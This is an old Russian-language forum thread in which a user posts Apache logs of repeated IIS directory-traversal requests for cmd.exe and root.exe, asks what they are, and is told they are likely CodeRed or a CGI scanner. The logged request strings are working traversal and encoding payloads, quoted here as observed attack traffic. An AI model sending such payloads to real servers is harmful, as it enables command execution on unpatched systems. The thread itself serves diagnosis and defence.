Легенда:
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | |
"моська и слон" басню Крылова читал? Рж :))) 16.04.02 20:56 Число просмотров: 1214
Автор: CETb2 Статус: Незарегистрированный пользователь
|
Не только трафик.. И настроение тоже...
Ведь учимся на опыте, значит и меня ломали :)))
[CETb]
|
<hacking>
|
Постоянные интернет-атаки на Web - сервера.. 16.04.02 05:07
Автор: CETb2 Статус: Незарегистрированный пользователь Отредактировано 16.04.02 05:12 Количество правок: 1
|
Почему-то мой Apache выдает такие попытки к взлому:
24.33.15.53 - - [15/Apr/2002:14:46:44 +0300] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 274
24.33.15.53 - - [15/Apr/2002:14:46:45 +0300] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 272
24.33.15.53 - - [15/Apr/2002:14:46:46 +0300] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
24.33.15.53 - - [15/Apr/2002:14:46:47 +0300] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
24.33.15.53 - - [15/Apr/2002:14:46:48 +0300] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.33.15.53 - - [15/Apr/2002:14:46:49 +0300] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.33.15.53 - - [15/Apr/2002:14:46:53 +0300] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 313
24.33.15.53 - - [15/Apr/2002:14:46:54 +0300] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329
24.33.15.53 - - [15/Apr/2002:14:46:55 +0300] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:56 +0300] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:57 +0300] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:58 +0300] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295
24.33.15.53 - - [15/Apr/2002:14:46:59 +0300] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
24.33.15.53 - - [15/Apr/2002:14:47:00 +0300] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 279
24.33.15.53 - - [15/Apr/2002:14:47:01 +0300] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
24.33.15.53 - - [15/Apr/2002:14:47:02 +0300] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
Первое время я прям бушевал (мой комп взламывают) - отсылал письма провайдерам. А потом забил. Но атаки такого типа не прекратились :((
Причем некоторые из них по времени и по последовательности действий идентичны.. Как напримере - каждую секунду - другая попытка...
Может -ли быть это каким-то целенаправленным сканированием сетей какой-то программой , скриптом, или другим мехнаиз-момо ?
Кто посоветует, что делать ??, как быть ??
[CETb]
|
|
Да это похоже на сканирование CGI сканнером 14.05.02 23:57
Автор: ih8u <i hate you> Статус: Member
|
|
|
"моська и слон" басню Крылова читал? 16.04.02 11:10
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
|
|
| |
"моська и слон" басню Крылова читал? 16.04.02 19:56
Автор: Renkvil <Boris> Статус: Member
|
;-)))
Толька моська была одна и не портила слону траффик.
;)
|
| | |
"моська и слон" басню Крылова читал? Рж :))) 16.04.02 20:56
Автор: CETb2 Статус: Незарегистрированный пользователь
|
Не только трафик.. И настроение тоже...
Ведь учимся на опыте, значит и меня ломали :)))
[CETb]
|
| | | |
... и будут пытаться ломать 16.04.02 22:51
Автор: ZaDNiCa <indeed ZaDNiCa> Статус: Elderman
|
от этого никуда спрячешься... другое дело что если видно что это попытки взлома не червем - надо стучать админам, ответственным за адресное пространство... мож в след раз уже не будут сканить..
а настроение не должно портиться - потому как не получилось сломать...
|
| | | | |
Порвал-бы этих тварей - будут знать как на мой комп покушаться!!! 17.04.02 09:28
Автор: CETb2 Статус: Незарегистрированный пользователь
|
О детях:
======================
Жалко ведь детей.. Кроме 14-16 летних никто так глубо атаковать не будут. Есть много прог определяющие типы софта установленных на OS-е и много другого дерьма, которое с потрохами продаст тебя - выдаст номер аськи, тип OSa, тип Сервера, покажет открытые порты, покажет какими прогами эти порты ломаются..
Даже не в детях дело. Профессионалы (или те, которые считают себя ими) должны разбираться достойно и не идти на такие "стучания"..
Хотя, это даже не дети шалили, а так - вирусы.. Но ведь за комп обидно.. ПОРВАЛ-БЫ ЭТИХ ТВАРЕЙ - БУДУТ ЗНАТЬ КАК НА МОЙ КОМП ПОКУШАТЬСЯ!!! ДОСТАЛИ ВИРУСЫ !!!
[CETb]
|
| |
:))) 16.04.02 17:28
Автор: CETb2 Статус: Незарегистрированный пользователь
|
|
|
ничего не делай 16.04.02 06:01
Автор: йцукенг <jcukeng> Статус: Member
|
> 24.33.15.53 - - [15/Apr/2002:14:46:44 +0300] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 274 > 24.33.15.53 - - [15/Apr/2002:14:46:45 +0300] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 272 ...
> > Может -ли быть это каким-то целенаправленным сканированием > сетей какой-то программой , скриптом, или другим > мехнаиз-момо ? > > Кто посоветует, что делать ??, как быть ?? это CodeRed, скорее всего, долбится с зараженных IIS'ов.
можешь забить - апачу это ничем не грозит.
впрочем, если с каких-то IP атака идет очень часто, напиши админам этих сеток письма - так и так, есть подозрение, что Ваша сетка заражена червем CodeRed, и праттачь кусок логов с соотв. IP.
|
| |
CodeRed запомнится на долго 16.04.02 06:15
Автор: CETb2 Статус: Незарегистрированный пользователь Отредактировано 16.04.02 06:28 Количество правок: 1
|
Знакомый вирус.. Когда он меня атаковал у меня IISv4 стоял. После этого я с ужасом смотрю на Microsoft и ее сетевые идеи...
Раньше атаки были каждые пол часа. Сейчас немного реже стало..
Печально :(((
[CETb]
|
|
|